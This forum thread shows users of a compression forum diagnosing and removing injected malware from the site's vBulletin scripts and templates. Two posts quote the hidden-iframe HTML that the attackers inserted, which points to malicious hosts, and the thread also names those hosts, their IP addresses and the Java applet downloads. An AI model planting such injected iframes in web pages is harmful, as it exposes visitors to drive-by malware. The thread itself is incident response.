Results 1 to 16 of 16

Thread: Forum malware injected? avast warning

  1. #1
    Programmer schnaader's Avatar
    Join Date
    May 2008
    Location
    Hessen, Germany
    Posts
    539
    Thanks
    192
    Thanked 174 Times in 81 Posts

    Forum malware injected? avast warning

    Every time I visit the encode.ru main page or any subpage, avast is warning me about a malware URL "http://kokosina.in/t/go.php?sid=5" - this seems to be some JavaScript spreading in vBulletin forums recently, but it's quite new, so there's no further information about what it is or how to handle/remove it.

    Looking at the site's source and JS, "http://encode.ru/clientscript/yui/connection/connection-min.js" looks quite suspicious, but could also be just some normal minified JS.
    http://schnaader.info
    Damn kids. They're all alike.

  2. #2
    Programmer osmanturan's Avatar
    Join Date
    May 2008
    Location
    Mersin, Turkiye
    Posts
    651
    Thanks
    0
    Thanked 0 Times in 0 Posts
    I've confirmed that with a HTTP Proxy (Fiddler). Something tries to connect first "http://kokosina.in/t/go.php?sid=5" and then several addresses at 109.236.82.79. And there are 2 attempts to download a Java applications which is located "109.236.82.79/vukavuka.class" and "109.236.82.79/vukavuka/class.class". Microsoft Security Essentials blocked all of the attacks. I'm trying to investigate the problem currently. I'll inform when I find something.
    BIT Archiver homepage: www.osmanturan.com

  3. #3
    Programmer osmanturan's Avatar
    Join Date
    May 2008
    Location
    Mersin, Turkiye
    Posts
    651
    Thanks
    0
    Thanked 0 Times in 0 Posts
    @schnaader: You're right. Problem caused by "http://encode.ru/clientscript/yui/connection/connection-min.js". It seems a typical "iframe" virus. It manipulates DOM by creating a iframe tag to connect somewhere. The odd thing is most of iframe viruses puts it's signature to end of javascript files. But, this one placed on top of a special script. I didn't bother to de-obfuscate the injected code but I can say that it patches YUI to be able to executed. Because, injected code does not invoked alone. Seems, it's especially designed for vBulletin.
    BIT Archiver homepage: www.osmanturan.com

  4. #4
    Member
    Join Date
    Sep 2008
    Location
    France
    Posts
    856
    Thanks
    447
    Thanked 254 Times in 103 Posts
    Malware presence confirmed on my side

  5. #5
    Expert
    Matt Mahoney's Avatar
    Join Date
    May 2008
    Location
    Melbourne, Florida, USA
    Posts
    3,255
    Thanks
    306
    Thanked 778 Times in 485 Posts
    McAfee seems unaware of the problem. http://www.siteadvisor.com/sites/http%3A//encode.ru

  6. #6
    Member
    Join Date
    Jun 2009
    Location
    Kraków, Poland
    Posts
    1,471
    Thanks
    26
    Thanked 120 Times in 94 Posts
    What that malware does? Which browsers are affected (maybe Chrome and IE9 aren't because of sandboxing)? Which OSes are affected?

  7. #7
    Tester
    Black_Fox's Avatar
    Join Date
    May 2008
    Location
    [CZE] Czechia
    Posts
    471
    Thanks
    26
    Thanked 9 Times in 8 Posts
    Chrome+Avast here, no malicious activity detected.
    I am... Black_Fox... my discontinued benchmark
    "No one involved in computers would ever say that a certain amount of memory is enough for all time? I keep bumping into that silly quotation attributed to me that says 640K of memory is enough. There's never a citation; the quotation just floats like a rumor, repeated again and again." -- Bill Gates

  8. #8
    Programmer osmanturan's Avatar
    Join Date
    May 2008
    Location
    Mersin, Turkiye
    Posts
    651
    Thanks
    0
    Thanked 0 Times in 0 Posts
    @Piotr: It's not browser specific infection. The malicious code creates iframe tag to download and run a java code. Only if only, your browser asks to run it, it can be caught. On the other hand, target URL looks like dead (well, specifically redirected URL). As a result, connection can't be established. In another words, malicious code does rely on a dead link.
    BIT Archiver homepage: www.osmanturan.com

  9. #9
    Member
    Join Date
    May 2008
    Location
    England
    Posts
    325
    Thanks
    18
    Thanked 6 Times in 5 Posts
    Very annoying, if this even posts. I get these warnings, the java plugin error in Opera 10.10, and the avira one pops up in 11.52. I can't even type crap in or do anything in O10.10 with this "malware" i'm having to type this in metapad and then paste it in. Check out the screenshots, and have you noticed how many guest's are online? O.o
    Attached Thumbnails Attached Thumbnails Click image for larger version. 

Name:	encode_ru-problem.png 
Views:	310 
Size:	54.6 KB 
ID:	1768   Click image for larger version. 

Name:	Avira_Warning.png 
Views:	260 
Size:	74.3 KB 
ID:	1769  

  10. #10
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    3,134
    Thanks
    179
    Thanked 921 Times in 469 Posts
    This really looks like malware in scripts on the server
    Unfortunately I don't have a server login and its a little hard for me to fix it, have to wait for encode/webmaster to notice.
    The script adds
    Code:
    <div style="display:none;"><iframe src="http://kokosina.in/t/go.php?sid=5" width="38" height="67" border="0" frameborder="0"></iframe></div>
    to the page code for some browsers. That loads and decrypts some javascripts, which in turn tries to load a java plugin and does other stuff.
    Anyway, a proposed fix for now is to add
    Code:
    127.0.0.1 kokosina.in
    to C:\WINDOWS\system32\drivers\etc\hosts


    Update: redirected to a clean copy for now. Encode, webmaster, please fix this anyway.

  11. #11
      webmaster's Avatar
    Join Date
    Jun 2010
    Location
    Saint-Petersburg, Russia
    Posts
    70
    Thanks
    12
    Thanked 53 Times in 24 Posts
    Fixed. Vulnerability scripts forum. Updated version will be tonight.

  12. #12
      webmaster's Avatar
    Join Date
    Jun 2010
    Location
    Saint-Petersburg, Russia
    Posts
    70
    Thanks
    12
    Thanked 53 Times in 24 Posts
    Done.

  13. #13
    Member Fallon's Avatar
    Join Date
    May 2008
    Location
    Europe - The Netherlands
    Posts
    154
    Thanks
    14
    Thanked 10 Times in 5 Posts
    Reported to Avast User Forum.
    http://forum.avast.com/index.php?topic=90437.0
    Reason for this alert is an outdated vBulletin version, which is open to an exploit.
    That's what they said.
    Fixed, at least for Avast.
    Well, and by the webmaster, now

  14. #14
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    3,134
    Thanks
    179
    Thanked 921 Times in 469 Posts
    I just deleted some
    Code:
    <div style='display:none'><iframe width='9' height='6' src='http://mavmor.in/loop.php'
    from a forum template ("footer").

  15. #15
    Member
    Join Date
    Jun 2009
    Location
    Kraków, Poland
    Posts
    1,471
    Thanks
    26
    Thanked 120 Times in 94 Posts
    Looks like you've done something wrong as I see "frameborder='0' scrolling='no'>" on every (or many at least) page at the bottom.
    Chromium 18 on Ubuntu.

  16. #16
    Administrator Shelwien's Avatar
    Join Date
    May 2008
    Location
    Kharkov, Ukraine
    Posts
    3,134
    Thanks
    179
    Thanked 921 Times in 469 Posts
    I noticed that too, but decided to keep it like that in hope that webmaster would notice sooner
    Not sure why this server is getting hacked so frequently... its not the forum itself I think -
    at least the template modification didn't appear in edit history.

Similar Threads

  1. New forum
    By Bulat Ziganshin in forum The Off-Topic Lounge
    Replies: 71
    Last Post: 14th August 2011, 19:01
  2. Researchers warn of malware hidden in .zip files
    By Surfer in forum The Off-Topic Lounge
    Replies: 4
    Last Post: 20th April 2010, 09:19
  3. A Small Warning
    By encode in forum The Off-Topic Lounge
    Replies: 1
    Last Post: 30th August 2008, 21:05
  4. New or old forum?
    By encode in forum The Off-Topic Lounge
    Replies: 21
    Last Post: 10th May 2008, 00:54
  5. NEW FORUM!
    By encode in forum Forum Archive
    Replies: 4
    Last Post: 5th May 2008, 10:15

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •